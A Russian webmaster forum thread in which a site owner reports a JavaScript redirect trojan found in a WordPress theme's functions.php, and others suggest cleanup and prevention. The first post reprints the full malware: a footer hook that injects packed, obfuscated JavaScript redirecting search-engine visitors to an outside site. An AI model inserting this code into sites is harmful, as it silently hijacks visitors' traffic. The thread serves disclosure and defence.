X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Обнаружил вирус в functions.php на WordPress
GreenMan
GreenMan
Topic Starter сообщение 19.3.2012, 12:54; Ответить: GreenMan
Сообщение #1


Сегодня зашел в панель Я.вебмастер и увидел, что на двух моих сайтах обнаружен вредоносный код.
"WTF?" - подумал я, на сайтах кроме ротатора ad1.ru ничего больше нет. Сайты на WordPress.
Захожу на сайты - да все верно, блокирует мой NOD32, значит что-то все таки не так. Порылся я в админке, теме, посмотрел исходный код, но ничего "левого" не увидел.
Тогда я скачал дамп файлов сайта и проверил его на вирусы NOD32. Оказалось, что в теме в functions.php был вот такой милый код:
Развернуть/Свернуть
<?php
add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
        echo '<!--scounter-->';
        if(function_exists('is_user_logged_in')){
            if(time()%2 == 0 && !is_user_logged_in()){            
                echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati
o
n'.split('|'),0,{}))</script>";
            }
        }
    }
?>

Этот код оказался и еще на одном сайте, где стояла такая же тема.
Удалил его - все нормально теперь, NOD32 не блокирует, Яндекс тоже "не выявил потенциально опасного кода".
Вроде бы и хэппи-энд, но мне интересно как он туда попал? Как обезопасить сайт от повторного взлома или что это было? У вас было такое?
Делюсь с вами, чтобы тоже имели ввиду, где может сидеть вирус.


--------------------
- вэбмастер-энтузиаст -
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
paranormal
paranormal
сообщение 19.3.2012, 13:00; Ответить: paranormal
Сообщение #2


Эта дрянь может вернуться. Посмотрите в 2х стандартных темах, которые вшиты в ВП и во всех остальных в папке /themes в томже файле functions.php. Очень часто после заражения вредорносный код есть и там.

Сообщение отредактировал paranormal - 19.3.2012, 13:13


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alex2906
alex2906
сообщение 19.3.2012, 16:49; Ответить: alex2906
Сообщение #3


Это JS:Redirector-MC [Trj], мучился неделю, почищу, через сутки опять есть. Прописывается в самом низу functions.php.
Обнови свою тему, можно еще выставить права на functions.php - 444 (только чтение), мне помогло. Ну и не активные темы тоже проверить надо.


--------------------
Гугли - гуглОм и не яндекси всуе


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GreenMan
GreenMan
Topic Starter сообщение 19.3.2012, 17:54; Ответить: GreenMan
Сообщение #4


(alex2906 @ 19.3.2012, 15:49) *
Это JS:Redirector-MC [Trj], мучился неделю, почищу, через сутки опять есть. Прописывается в самом низу functions.php.
Обнови свою тему, можно еще выставить права на functions.php - 444 (только чтение), мне помогло. Ну и не активные темы тоже проверить надо.

Да, так его NOD32 и назвал.
Спасибо, буду пробовать.


--------------------
- вэбмастер-энтузиаст -
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
style93
style93
сообщение 21.3.2012, 0:21; Ответить: style93
Сообщение #5


а вы не помните с какого сайта качали??знаюю мне знакомый рассказывал была та же проблема, скачал фри тему , помогло только то, что скачал такую же но с другого сайта...Советую сделать также


--------------------
77090
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 21.3.2012, 2:07; Ответить: Electric
Сообщение #6


Не качайте "супер премиум темы" с левых сайтов. Качайте их с официального сайта ВП или заказывайте у профи.
Советую проверить сайты по ФТП на наличие шеллов, так как ситуация может повторится.
http://www.maultalk.com/topic116023.html - советы по чистке и профилактике.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПродам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка.
17 Boymaster 9765 17.3.2024, 2:53
автор: Boymaster
Открытая тема (нет новых ответов) Перенос сайта на CMS Wordpress
8 freeax 4843 10.3.2024, 14:58
автор: freeax
Открытая тема (нет новых ответов) Как настроить в WordPress для SEO оптимизации
8 rownong27 2427 2.3.2024, 12:59
автор: toplinks
Горячая тема (нет новых ответов) Восстановление сайтов из Вебархива на Wordpress.
39 freeax 32490 14.2.2024, 14:32
автор: freeax
Открытая тема (нет новых ответов) Разработка/доработка сайтов Wordpress, HTML/CSS/JS
Вёрстка, перенос на WP, правки
9 malamut 3328 25.1.2024, 14:36
автор: malamut


 



RSS Текстовая версия Сейчас: 28.3.2024, 13:27
Дизайн